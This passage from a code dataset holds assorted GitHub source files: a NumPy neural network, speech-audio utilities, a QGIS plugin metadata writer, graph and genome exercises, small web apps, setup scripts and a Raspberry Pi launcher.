A \n \n ## calculate output layer Z & A using Sigmoid ## \n W = param['W'+str(size_nn - 1)]\n A_prev = A_all['A' + str(size_nn-2)]\n b = param['b' + str(size_nn - 1)]\n \n Z= np.dot(W,A_prev) + b\n A = sigmoid(Z)\n \n Z_all['Z' + str(size_nn-1)] = Z\n A_all['A'+str(size_nn-1)] = A\n \n return (Z_all, A_all) \n\ndef comp_cost(A_all,y,size_nn):\n \n y_hat = A_all['A'+str(size_nn-1)]\n y_act = y\n m = np.size(y)\n \n cost = - np.sum((y_act*np.log(y_hat)) + (1-y_act)*np.log(1-y_hat))/m \n np.squeeze(cost)\n \n return cost \n\ndef backward_prop(layer_nn,A_all,y,param,Z_all,beta1):\n size_nn = len(layer_nn)\n m = np.size(y)\n dZ_all,dW_all, db_all = {},{},{}\n Vdw, Vdb, Sdw, Sdb = {},{},{},{}\n \n dz = A_all['A'+str(size_nn-1)] - y\n dw = (np.dot(dz,A_all['A'+str(size_nn-2)].T))/m\n db = (np.sum(dz, axis=1, keepdims=True))/m\n dZ_all['dZ' + str(size_nn-1)] = dz\n dW_all['dW' + str(size_nn-1)] = dw\n db_all['db' + str(size_nn-1)] = db\n \n for i in range(size_nn-2,0,-1): \n dz = np.dot(param['W'+str(i+1)].T,dZ_all['dZ' + str(i+1)])\n dz = dz*relu_deriv(Z_all['Z' + str(i)])\n dw = np.dot(dz,A_all['A' + str(i-1)].T)/m\n db = np.sum(dz,axis=1,keepdims=True)/m \n dZ_all['dZ' + str(i)] = dz\n dW_all['dW' + str(i)] = dw\n db_all['db' + str(i)] = db \n \n ## initializaing Gradient Momemtum Parameters\n for i in range(1,size_nn):\n Vdw[\"dW\"+ str(i)] = np.zeros_like(dW_all[\"dW\" + str(i)])\n Vdb[\"db\" + str(i)] = np.zeros_like(db_all[\"db\" + str(i)])\n \n ## updatng Gradient Momentum parameters\n for i in range(1,size_nn):\n Vdw[\"dW\"+ str(i)] = beta1*Vdw[\"dW\"+ str(i)] + (1-beta1)*dW_all[\"dW\"+ str(i)]\n Vdb[\"db\"+ str(i)] = beta1*Vdb[\"db\"+ str(i)] + (1-beta1)*db_all[\"db\"+ str(i)]\n \n \n return (dZ_all,Vdw,Vdb)\n \ndef param_update(Vdw,Vdb,param,alpha,size_nn):\n \n alpha = .01\n for i in range(1,size_nn):\n param['W'+str(i)] -= alpha*Vdw['dW'+str(i)] # using GDM parameters to updated weight\n param['b'+str(i)] -= alpha*Vdb['db'+str(i)] # using GDM parameters to updated bias\n \n return param\n\ndef forward_prop_test(param,x,y,size_nn):\n\n A = x\n A_prev = A \n A_all ={}\n Z_all = {} \n \n for i in range (1,size_nn-1):\n W = param['W'+str(i)]\n A_prev = A\n b = param['b' + str(i)]\n \n Z = np.dot(W,A_prev) + b \n A = relu(Z)\n \n Z_all['Z' + str(i)] = Z\n A_all['A' + str(i)] = A \n \n ## calculate output layer Z & A using Sigmoid ## \n W = param['W'+str(size_nn - 1)]\n A_prev = A_all['A' + str(size_nn-2)]\n b = param['b' + str(size_nn - 1)]\n \n Z= np.dot(W,A_prev) + b\n A = sigmoid(Z)\n \n Z_all['Z' + str(size_nn-1)] = Z\n A_all['A'+str(size_nn-1)] = A\n \n return (Z_all, A_all) \n\n\n\n","repo_name":"singhmnprt01/Deep-Neural-Network-using-NumPy","sub_path":"4_DNN Numpy with General_NN__csv_excel_data_load/4th_end_to_end_dnn.py","file_name":"4th_end_to_end_dnn.py","file_ext":"py","file_size_in_byte":11786,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"1715283279","text":"\"\"\" from https://github.com/NVIDIA/tacotron2 \"\"\"\n\nimport torch\nimport numpy as np\nfrom scipy.io.wavfile import read\nfrom scipy.io.wavfile import write\n\nimport audio.stft as stft\nimport audio.hparams_audio as hparams\nfrom audio.audio_processing import griffin_lim\n\n_stft = stft.TacotronSTFT(\n hparams.filter_length, hparams.hop_length, hparams.win_length,\n hparams.n_mel_channels, hparams.sampling_rate, hparams.mel_fmin,\n hparams.mel_fmax)\n\n\ndef load_wav_to_torch(full_path):\n sampling_rate, data = read(full_path)\n return torch.FloatTensor(data.astype(np.float32)), sampling_rate\n\n\ndef get_mel(filename):\n audio, sampling_rate = load_wav_to_torch(filename)\n if sampling_rate != _stft.sampling_rate:\n raise ValueError(\"{} {} SR doesn't match target {} SR\".format(\n sampling_rate, _stft.sampling_rate))\n audio_norm = audio / hparams.max_wav_value\n audio_norm = audio_norm.unsqueeze(0)\n audio_norm = torch.autograd.Variable(audio_norm, requires_grad=False)\n melspec = _stft.mel_spectrogram(audio_norm)\n melspec = torch.squeeze(melspec, 0)\n # melspec = torch.from_numpy(_normalize(melspec.numpy()))\n\n return melspec\n\n\ndef get_mel_from_wav(audio):\n sampling_rate = hparams.sampling_rate\n if sampling_rate != _stft.sampling_rate:\n raise ValueError(\"{} {} SR doesn't match target {} SR\".format(\n sampling_rate, _stft.sampling_rate))\n audio_norm = audio / hparams.max_wav_value\n audio_norm = audio_norm.unsqueeze(0)\n audio_norm = torch.autograd.Variable(audio_norm, requires_grad=False)\n melspec = _stft.mel_spectrogram(audio_norm)\n melspec = torch.squeeze(melspec, 0)\n\n return melspec\n\n\ndef inv_mel_spec(mel, out_filename, griffin_iters=60):\n mel = torch.stack([mel])\n # mel = torch.stack([torch.from_numpy(_denormalize(mel.numpy()))])\n mel_decompress = _stft.spectral_de_normalize(mel)\n mel_decompress = mel_decompress.transpose(1, 2).data.cpu()\n spec_from_mel_scaling = 1000\n spec_from_mel = torch.mm(mel_decompress[0], _stft.mel_basis)\n spec_from_mel = spec_from_mel.transpose(0, 1).unsqueeze(0)\n spec_from_mel = spec_from_mel * spec_from_mel_scaling\n\n audio = griffin_lim(torch.autograd.Variable(\n spec_from_mel[:, :, :-1]), _stft.stft_fn, griffin_iters)\n\n audio = audio.squeeze()\n audio = audio.cpu().numpy()\n audio_path = out_filename\n write(audio_path, hparams.sampling_rate, audio)\n","repo_name":"xcmyz/FastSpeech","sub_path":"audio/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":2432,"program_lang":"python","lang":"en","doc_type":"code","stars":822,"dataset":"github-code","pt":"77"} +{"seq_id":"3217018771","text":"import os.path\nimport pathlib\nimport re\n\nfrom os import getenv\nimport platform\nfrom typing import List\n\nfrom qgis.PyQt.QtCore import QStandardPaths, QSettings\nfrom qgis.core import QgsApplication\n\nfrom qgis.core import QgsUserProfileManager\n\n\ndef userProfileManager() -> QgsUserProfileManager:\n globalsettingsfile = None\n configLocalStorageLocation = None\n\n if globalsettingsfile is None:\n globalsettingsfile: str = getenv(\"QGIS_GLOBAL_SETTINGS_FILE\")\n\n if globalsettingsfile is None:\n startupPaths = QStandardPaths.locateAll(QStandardPaths.AppDataLocation, \"qgis_global_settings.ini\")\n if startupPaths:\n globalsettingsfile = startupPaths[0]\n\n if globalsettingsfile is None:\n default_globalsettingsfile = QgsApplication.resolvePkgPath() + \"/resources/qgis_global_settings.ini\"\n if os.path.isfile(default_globalsettingsfile):\n globalsettingsfile = default_globalsettingsfile\n\n if configLocalStorageLocation is None:\n if globalsettingsfile is not None:\n globalSettings = QSettings(globalsettingsfile, QSettings.IniFormat)\n if globalSettings.contains(\"core/profilesPath\"):\n configLocalStorageLocation = globalSettings.value(\"core/profilesPath\", \"\")\n\n if configLocalStorageLocation is None:\n home = pathlib.Path('~').expanduser()\n basePath = None\n if platform.system() == 'Windows':\n basePath = home / 'AppData/Roaming/QGIS/QGIS3'\n elif platform.system() == 'Linux':\n basePath = home / '.local/share/QGIS/QGIS3'\n if basePath is None:\n raise NotImplementedError(f'No QGIS basePath for {platform.system()}')\n\n configLocalStorageLocation = basePath.as_posix()\n\n rootProfileFolder = QgsUserProfileManager.resolveProfilesFolder(configLocalStorageLocation)\n return QgsUserProfileManager(rootProfileFolder)\n\n\nclass QGISMetadataFileWriter(object):\n \"\"\"\n A class to store and write the QGIS plugin metadata.txt\n For details see:\n https://docs.qgis.org/3.16/en/docs/pyqgis_developer_cookbook/plugins/plugins.html#plugin-metadata-table\n \"\"\"\n\n def __init__(self):\n self.mName = ''\n self.mDescription = ''\n self.mVersion = ''\n self.mQgisMinimumVersion = '3.8'\n self.mQgisMaximumVersion = '3.99'\n self.mAuthor = ''\n self.mAbout = ''\n self.mEmail = ''\n self.mHomepage = ''\n self.mIcon = ''\n self.mTracker = ''\n self.mRepository = ''\n self.mIsExperimental = ''\n self.mHasProcessingProvider: bool = False\n self.mTags: List[str] = []\n self.mCategory: str = ''\n self.mChangelog: str = ''\n self.mPlugin_dependencies: List[str] = []\n\n def validate(self) -> bool:\n return True\n\n def formatTag(self, tag: str, value, sep: str = ', '):\n s = f'{tag}='\n if isinstance(value, list):\n s += f'{sep}'.join(value)\n else:\n s += f'{value}'\n return s\n\n def metadataString(self) -> str:\n assert self.validate()\n\n lines = ['[general]']\n lines.append(self.formatTag('name', self.mName))\n lines.append(self.formatTag('author', self.mAuthor))\n if self.mEmail:\n lines.append(self.formatTag('email', self.mEmail))\n\n lines.append(self.formatTag('description', self.mDescription))\n lines.append(self.formatTag('version', self.mVersion))\n\n lines.append(self.formatTag('qgisMinimumVersion', self.mQgisMinimumVersion))\n lines.append(self.formatTag('qgisMaximumVersion', self.mQgisMaximumVersion))\n lines.append(self.formatTag('about', re.sub('\\n', '', self.mAbout)))\n\n lines.append(self.formatTag('icon', self.mIcon))\n lines.append(self.formatTag('tags', self.mTags))\n lines.append(self.formatTag('category', self.mRepository))\n\n if self.mHasProcessingProvider:\n lines.append('hasProcessingProvider=yes')\n else:\n lines.append('hasProcessingProvider=no')\n lines.append(self.formatTag('homepage', self.mHomepage))\n\n if self.mTracker:\n lines.append(self.formatTag('tracker', self.mTracker))\n\n if self.mRepository:\n lines.append(self.formatTag('repository', self.mRepository))\n\n if isinstance(self.mIsExperimental, bool):\n lines.append(self.formatTag('experimental', self.mIsExperimental))\n\n if len(self.mPlugin_dependencies) > 0:\n lines.append(self.formatTag('plugin_dependencies', self.mPlugin_dependencies))\n # lines.append('deprecated={}'.format(self.mIsDeprecated))\n lines.append('')\n lines.append(self.formatTag('changelog', self.mChangelog))\n\n return '\\n'.join(lines)\n\n \"\"\"\n [general]\n name=dummy\n description=dummy\n version=dummy\n qgisMinimumVersion=dummy\n qgisMaximumVersion=dummy\n author=dummy\n about=dummy\n email=dummy\n icon=dummy\n homepage=dummy\n tracker=dummy\n repository=dummy\n experimental=False\n deprecated=False\n tags=remote sensing, raster, time series, data cube, landsat, sentinel\n category=Raster\n \"\"\"\n\n def writeMetadataTxt(self, path: str):\n with open(path, 'w', encoding='utf-8', newline='\\n') as f:\n f.write(self.metadataString())\n","repo_name":"EnMAP-Box/qgispluginsupport","sub_path":"qps/make/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":5338,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"32839019011","text":"def cipher_check_3(X):\n result = []\n if X < 1000 and X >= 100:\n cipher = [100, 10, 1]\n temp = 0\n for c in cipher:\n temp = X / c\n temp = int(temp)\n result.append(temp)\n X = X - (temp * c)\n return result\n\n","repo_name":"Lnkyoung16/number_guessing_game","sub_path":"cipher_check_3.py","file_name":"cipher_check_3.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34775544675","text":"from data_stark import lista_personajes\n#MAS ALTO\npersonaje_mas_alto = lista_personajes[0]\naltura_maxima = float(personaje_mas_alto[\"altura\"])\n\nfor heroe in lista_personajes:\n heroe[\"altura\"] = float(heroe[\"altura\"])\n if(heroe[\"altura\"] > altura_maxima):\n altura_maxima = heroe[\"altura\"]\n\nprint(\"Mas alto: {0} - Nombre: {1}\".format(altura_maxima,personaje_mas_alto[\"nombre\"]))\n\n#MAS BAJO\n\npersonaje_mas_bajo = lista_personajes[0]\naltura_minima = float(personaje_mas_bajo[\"altura\"])\n\nfor heroe in lista_personajes:\n heroe[\"altura\"] = float(heroe[\"altura\"])\n if(heroe[\"altura\"] < altura_minima):\n altura_minima = heroe[\"altura\"]\n\nprint(\"Mas bajo: {0} - Nombre: {1}\".format(altura_minima,personaje_mas_bajo[\"nombre\"]))\n\n# ALTURA PROMEDIO\n\ncantidad_heroes = 0\nacumulador_altura = 0\n\nfor heroe in lista_personajes:\n cantidad_heroes = cantidad_heroes + 1\n acumulador_altura = acumulador_altura + heroe[\"altura\"]\n\nprint(\"Promedio: {2} - Cantidad: {0} - acumulador: {1}\".format(cantidad_heroes,acumulador_altura,acumulador_altura/cantidad_heroes))\n\n\n","repo_name":"MarianoIzarriaga/ProgramacionUTN","sub_path":"Ejercicio_marvel00/marvel.py","file_name":"marvel.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74213014008","text":"'''\r\nBreadth-first Search from AlgoExpert.io\r\nJanuary 2021 Jakub Kazimierski\r\n'''\r\n\r\nclass Node:\r\n def __init__(self, name):\r\n self.children = []\r\n self.name = name\r\n\r\n def addChild(self, name):\r\n self.children.append(Node(name))\r\n return self\r\n\r\n def returnChild(self, name):\r\n '''\r\n Method created for tests (not best one)\r\n '''\r\n for child in self.children:\r\n if child.name == name:\r\n return child\r\n\r\n\r\n def breadthFirstSearch(self, array):\r\n '''\r\n You're given a Node class that has a name\r\n and an array of optional children nodes.\r\n When put together, nodes form an acyclic tree-like\r\n structure.\r\n\r\n Implement the breadthFirstSearch method on the Node class,\r\n which takes in an empty array, traverses the tree using\r\n the breadth-first Search approach (specifically navigating\r\n the tree from left to right), stores all of the nodes' names\r\n in the input array, and returns it.\r\n '''\r\n \r\n # implementation based on queue (fifo)\r\n # time O(v+e) for each vertex edges are checked\r\n # v-vertices e-edges| space O(n)\r\n queue = []\r\n\r\n array.append(self.name)\r\n\r\n queue.extend(self.children)\r\n\r\n while len(queue) != 0:\r\n node = queue.pop(0)\r\n array.append(node.name)\r\n queue.extend(node.children)\r\n\r\n return array\r\n\r\ndef setUp():\r\n '''\r\n Returns graph for tests\r\n '''\r\n graph = Node('A')\r\n graph.addChild('B')\r\n graph.addChild('C')\r\n graph.addChild('D')\r\n \r\n node_B = graph.returnChild('B')\r\n node_B.addChild('E')\r\n node_B.addChild('F')\r\n \r\n node_F = node_B.returnChild('F')\r\n node_F.addChild('I')\r\n node_F.addChild('J')\r\n\r\n node_D = graph.returnChild('D')\r\n node_D.addChild('G')\r\n node_D.addChild('H')\r\n\r\n node_G = node_D.returnChild('G')\r\n node_G.addChild('K')\r\n\r\n\r\n return graph ","repo_name":"JakubKazimierski/PythonPortfolio","sub_path":"AlgoExpert_algorithms/Medium/Breadth_first_Search/Breadth_first_Search.py","file_name":"Breadth_first_Search.py","file_ext":"py","file_size_in_byte":2016,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"77"} +{"seq_id":"39212581267","text":"# coding: utf-8\n\n\"\"\"\n Creditas OpenAPI\n\n This is specification of the Creditas OpenAPI. It contains definitions of Creditas banking services exposed via API accessible on the internet. # noqa: E501\n\n OpenAPI spec version: 1.0.0\n Contact: is@creditas.cz\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nfrom setuptools import setup, find_packages # noqa: H301\nfrom pathlib import Path\n\nNAME = \"creditas\"\nVERSION = \"1.0.0.1\"\n# To install the library, run the following\n#\n# python setup.py install\n#\n# prerequisite: setuptools\n# http://pypi.python.org/pypi/setuptools\n\nREQUIRES = [\n \"certifi>=2017.4.17\",\n \"python-dateutil>=2.1\",\n \"six>=1.10\",\n \"urllib3>=1.23\"\n]\n \nthis_directory = Path(__file__).parent\nlong_description = (this_directory / \"README.md\").read_text()\n\n\nsetup(\n name=NAME,\n version=VERSION,\n description=\"Creditas OpenAPI\",\n author_email=\"is@creditas.cz\",\n url=\"\",\n keywords=[\"Swagger\", \"Creditas OpenAPI\"],\n install_requires=REQUIRES,\n packages=find_packages(),\n include_package_data=True,\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n)\n","repo_name":"peberanek/creditas","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43816868592","text":"class Solution:\n \"\"\"\n Given an array of integers nums which is sorted in ascending order, and an integer target, write a function to search target in nums.\n If target exists, then return its index. Otherwise, return -1.\n \"\"\"\n def search(self, nums: List[int], target: int) -> int:\n l, r = 0, len(nums) - 1\n \n # Until l and r converge on a target\n while l <= r:\n m = l + ((r-1)//2) # Apparently (l + r) // 2 can lead to overflow\n if nums[m] > target:\n r = m - 1\n elif nums[m] < target:\n l = m + 1\n else:\n return m\n return -1","repo_name":"aroy105/LeetCode","sub_path":"BinarySearch/704-binary_search.py","file_name":"704-binary_search.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30142482309","text":"genome = \"CGGACTCGACAGATGTGAAGAACGACAATGTGAAGACTCGACACGACAGAGTGAAGAGAAGAGGAAACATTGTAA\"\nwith open(\"E_coli.txt\") as file:\n for line in file:\n if line.startswith(\"A\") or line.startswith(\"T\") or line.startswith(\"G\") or line.startswith(\"C\"):\n genome += line\n else:\n k, length, times = line.split()\n k = int(k)\n length = int(length)\n times = int(times)\nk = 9\nlength = 500\ntimes = 3\n\n\ndef build_k_mer_frequency_dict(genome):\n k_mers = {}\n for i in range(len(genome) - k):\n current_k_mer = genome[i:i+k]\n if current_k_mer not in k_mers:\n k_mers[current_k_mer] = [i]\n else:\n k_mers[current_k_mer].append(i)\n return k_mers\n\n\ndef calculate_amount_of_clumps(k, length, times, k_mers_dict):\n result = []\n for key, value in k_mers_dict.items():\n if len(value) >= times:\n for index in range(len(value) - times + 1):\n total = length - k\n potential_clump = value[index:index+times]\n start = potential_clump[0]\n end = potential_clump[-1]\n if end - start <= total:\n result.append(key)\n break\n\n return result\n\n\n\n\n\n\n\nk_mers_dict = build_k_mer_frequency_dict(genome)\nresult = calculate_amount_of_clumps(k=k, k_mers_dict=k_mers_dict, length=length, times=times)\nprint(result)\nprint(len(result))\n\n#After optimisation, it now needs around 4 seconds! Much better :). This does require a more algorithmic approach though,\n#and may pose a significant challenge to unseasoned practicioners. Can it get faster? For sure! But I'd rather deal with the\n#other materials of the course, and besides, there are enough free tools on the internet, who do the same job :)\n#Hint: Try writing it in Cython, C++ or even C! If you opt for a better algorithmic approach and confer to numba rules, you may\n#even get it to milliseconds range! But is the roughly 3 seconds speedup worth the time investment?","repo_name":"Nikikapralov/Bioinformatics","sub_path":"Specialisation/Finding hidden messages in DNA/Week 1/clump_finding/efficient_clump_finding.py","file_name":"efficient_clump_finding.py","file_ext":"py","file_size_in_byte":2024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39835138663","text":"import pandas as pd\nimport os\n\nunivs = [\"American75\",\"Bowdoin47\",\"Cornell5\",\"Haverford76\",\"Maine59\",\"Notre Dame57\",\"Rochester38\",\"Tennessee95\",\"UCF52\",\"UIllinois20\",\"Vassar85\",\"Williams40\",\n\"Amherst41\",\"Brandeis99\",\"Dartmouth6\",\"Howard90\",\"Maryland58\",\"Oberlin44\",\"Rutgers89\",\"Texas80\",\"UCLA26\",\"UMass92\",\"Vermont70\",\"Wisconsin87\",\n\"Brown11\",\"Duke14\",\"Indiana69\",\"Mich67\",\"Oklahoma97\",\"Santa74\",\"Texas84\",\"UCSB37\",\"UNC28\",\"Villanova62\",\"Yale4\",\n\"Auburn71\",\"Bucknell39\",\"Emory27\",\"JMU79\",\"Michigan23\",\"Penn94\",\"Simmons81\",\"Trinity100\",\"UCSC68\",\"UPenn7\",\"Virginia63\",\n\"BC17\",\"Cal65\",\"FSU53\",\"Johns Hopkins55\",\"Middlebury45\",\"Pepperdine86\",\"Smith60\",\"Tufts18\",\"UCSD34\",\"USC35\",\"Wake73\",\n\"BU10\",\"Caltech36\",\"GWU54\",\"Lehigh96\",\"Mississippi66\",\"Princeton12\",\"Stanford3\",\"Tulane29\",\"UChicago30\",\"USF51\",\"WashU32\",\n\"Baylor93\",\"Carnegie49\",\"Georgetown15\",\"MIT8\",\"NYU9\",\"Swarthmore42\",\"UC33\",\"UConn91\",\"USFCA72\",\"Wellesley22\",\n\"Berkeley13\",\"Colgate88\",\"Hamilton46\",\"MSU24\",\"Northeastern19\",\"Reed98\",\"Syracuse56\",\"UC61\",\"UF21\",\"UVA16\",\"Wesleyan43\",\n\"Bingham82\",\"Columbia2\",\"Harvard1\",\"MU78\",\"Northwestern25\",\"Rice31\",\"Temple83\",\"UC64\",\"UGA50\",\"Vanderbilt48\",\"William77\"]\n\ndef generate_edges(folder_name):\n\n PREFIX = \"data/\" + folder_name + \"/\" + folder_name\n FILE = PREFIX + \".edgelist\"\n OUTFILE = PREFIX + \"_bidirectional.edgelist\"\n\n os.system(\"rm -rf \" + PREFIX + \"_bidirectional_male.edgelist\")\n os.system(\"rm -rf \" + PREFIX + \"_bidirectional_female.edgelist\")\n\n with open(FILE, \"r\") as f:\n edges = f.readlines()\n\n result = \"\"\n\n for edge in edges:\n edge_split = edge.split()\n left = int(edge_split[0])\n right = int(edge_split[1])\n result += edge_split[0]+\"\\t\"+edge_split[1]+\"\\n\"\n result += edge_split[1]+\"\\t\"+edge_split[0]+\"\\n\"\n \n with open(OUTFILE, \"w\") as f:\n f.write(result)\n\n\nfor univ in univs:\n print(univ)\n generate_edges(univ)\n","repo_name":"vikramkarthikeyan/facebook-motif-analysis","sub_path":"bidirectional.py","file_name":"bidirectional.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4428815347","text":"import gradio as gr\nfrom tabs import kgVisualizationTab, eventExtractionTab, questionAnswerTab, UniversalEventDetectorTab, eventVisualizationTab, esgClassificationTab\n\ntitle = \"Coypu MoD\"\n\n'''main gradio function that defines all tabs'''\nwith gr.Blocks(css=\"#row {height: 100%} .gradio-container {background-color: #E8E8DC}\", title=title) as demo:\n with gr.Row():\n img_funny_coy = gr.Image(\"./images/colored_top_image.svg\")\n with gr.Tab('KG Connect & Visualization'):\n kgVisualizationTab.render()\n #with gr.Tab('Knowledge Extraction'):\n # knowledgeExtractionTab.render()\n with gr.Tab('Event Extraction'):\n eventExtractionTab.render()\n with gr.Tab('Universal Event Detection'):\n UniversalEventDetectorTab.render()\n # with gr.Tab('Event Visualization'):\n # eventVisualizationTab.render()\n with gr.Tab('Question Answering'):\n questionAnswerTab.render()\n\n with gr.Tab('ESG Classification'):\n esgClassificationTab.render()\n \nif __name__ == \"__main__\":\n demo.launch(server_name=\"0.0.0.0\")\n","repo_name":"semantic-systems/SEMS-tool-suite","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31604567250","text":"from fastapi import FastAPI, status\nfrom fastapi.responses import JSONResponse\nfrom fastapi.middleware.cors import CORSMiddleware\n\nfrom src.routes.post import router as Post\n\nimport src.database as database\nimport src.models as models\n\n# Initialize database with downloaded data from external API\ndatabase.initialize_collection_posts()\n\n# Add openAPI tags to Swagger\nopenapi_tags = [\n {\n \"name\": \"Post\",\n \"description\": \"Endpoints are responsible for post operations.\",\n },\n]\n\n# Create FastAPI app\napp = FastAPI(\n title=\"Server\",\n openapi_tags=openapi_tags,\n)\n\n# Add Middleware\norigins = [\"*\"]\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=False,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n# Include router\napp.include_router(Post)\n\n\n@app.get(\"/\", status_code=200, response_model=models.Content, tags=[\"Root\"])\nasync def root():\n \"\"\"\n The endpoint is responsible for returning simple hello message to check if server container is running.\n \"\"\"\n content = {\n \"status\": \"success\",\n \"message\": \"Hello World from the server container!\",\n }\n return JSONResponse(status_code=status.HTTP_200_OK, content=content)\n","repo_name":"matusstas/testovacie-zadanie","sub_path":"server/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18666686756","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\"\"\"\n给你一个数组 prices ,其中 prices[i] 是商店里第 i 件商品的价格。\n\n商店里正在进行促销活动,如果你要买第 i 件商品,那么你可以得到与 prices[j] 相等的折扣,其中 j 是满足 j > i 且 prices[j] <= prices[i] 的 最小下标 ,如果没有满足条件的 j ,你将没有任何折扣。\n\n请你返回一个数组,数组中第 i 个元素是折扣后你购买商品 i 最终需要支付的价格。\n\"\"\"\n\n\nclass Solution:\n def finalPrices(self, prices):\n if len(prices) == 1:\n return prices\n final_prices = []\n for i in range(len(prices) - 1):\n price = prices[i]\n for j in range(i + 1, len(prices)):\n if prices[j] <= price:\n price = price - prices[j]\n break\n final_prices.append(price)\n final_prices.append(prices[-1])\n return final_prices\n\n\nprices = [8, 4, 6, 2, 3]\nsol = Solution()\nres = sol.finalPrices(prices)\nprint(res)\n","repo_name":"LikeSco/learn-python","sub_path":"py-exam/1475.finalPrices.py","file_name":"1475.finalPrices.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"42605774166","text":"from setuptools import setup\nimport codecs\nimport os\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\nwith codecs.open(os.path.join(here, \"README.md\"), encoding=\"utf-8\") as fh:\n long_description = \"\\n\" + fh.read()\n\nVERSION = \"0.0.10\"\nDESCRIPTION = \"AWS CLI MFA - Easily Manage Session Token\"\nLONG_DESCRIPTION = \"Use MFA to increase the security of your AWS environment. Signing in with MFA requires an authentication code from an MFA device.\"\n\n# Setting up\nsetup(\n name=\"cli-aws-mfa\",\n version=VERSION,\n author=\"imajeetyadav (Ajeet Yadav)\",\n author_email=\"\",\n description=DESCRIPTION,\n long_description_content_type=\"text/markdown\",\n long_description=long_description,\n packages=[\"MFA\"],\n keywords=[\"aws\", \"mfa\", \"virtual\"],\n py_modules=[\"cli\"],\n entry_points={\n \"console_scripts\": [\n \"cli-aws-mfa = cli:mfa\",\n ]\n },\n install_requires=[\"click\", \"boto3\"],\n)\n","repo_name":"imajeetyadav/aws-cli-mfa","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25069712517","text":"pidfile = 'main_notification.pid'\nworker_tmp_dir = '/dev/shm'\nworker_class = 'gthread'\nworkers = 1\nworker_connections = 1000\ntimeout = 30\nkeepalive = 2\nthreads = 2\nproc_name = 'main_notification'\nbind = '0.0.0.0:5002'\nbacklog = 2048\naccesslog = '-'\nerrorlog = '-'","repo_name":"casperbh96/Flask-Stripe-MySQL-Bootstrapped","sub_path":"app/Gunicorn/guni_notification.py","file_name":"guni_notification.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":133,"dataset":"github-code","pt":"77"} +{"seq_id":"25777838947","text":"# Rename key of a dictionary\r\n# Write a program to rename a key city to a location in the following dictionary.\r\n\r\ndef check_element(sample_dict,key,repkey):\r\n keyValue = sample_dict.pop(key)\r\n sample_dict[repkey] = keyValue\r\n return sample_dict \r\n\r\nif __name__ == '__main__':\r\n sample_dict = {\r\n \"name\": \"Kelly\",\r\n \"age\":25,\r\n \"salary\": 8000,\r\n \"city\": \"New york\"\r\n}\r\n key = input(\"Enter the key: \")\r\n repkey = input(\"Enter the key replace: \")\r\n result=check_element(sample_dict,key,repkey)\r\n print(result)","repo_name":"iamanuragsaini/Python-Expert","sub_path":"Problems/Dictionary/Problem8.py","file_name":"Problem8.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"3739709980","text":"import RPi.GPIO as GPIO # Import Raspberry Pi GPIO library\nimport subprocess\nglobal counter\nimport time\nimport vlc\ncounter = 0\nglobal launch, kill\nlaunch = vlc.MediaPlayer(\"file:///home/pi/PiGlassv2/launch.mp3\")\nkill = vlc.MediaPlayer(\"file:///home/pi/PiGlassv2/kill.mp3\")\nimport psutil\n\ndef checkIfProcessRunning(processName):\n '''\n Check if there is any running process that contains the given name processName.\n '''\n #Iterate over the all the running process\n for proc in psutil.process_iter():\n try:\n # Check if process name contains the given name string.\n if processName.lower() in proc.name().lower():\n return True\n except (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):\n pass\n return False;\n\ndef button_callback(channel):\n global counter, launch, kill\n counter += 1\n print(\"counter: \"+str(counter))\n print(\"Mod: \"+str(counter%2))\n if(counter%2 == 1):\n print(\"Launcher\")\n #subprocess.Popen([\"sudo\", \"mpg123\", \"/home/pi/PiGlassv2/launcher.mp3\"], shell=False)\n launch.play()\n launch = vlc.MediaPlayer(\"file:///home/pi/PiGlassv2/launch.mp3\")\n# time.sleep(2)\n subprocess.Popen([\"python3\", \"/home/pi/PiGlassv2/newmenu.py\"], shell=False)\n elif(counter%2 == 0):\n if checkIfProcessRunning('kodi'):\n print('kodi is running')\n subprocess.Popen([\"sudo\", \"systemctl\", \"restart\", \"lightdm.service\"], shell=False) \n else:\n print('No kodi process was running')\n# 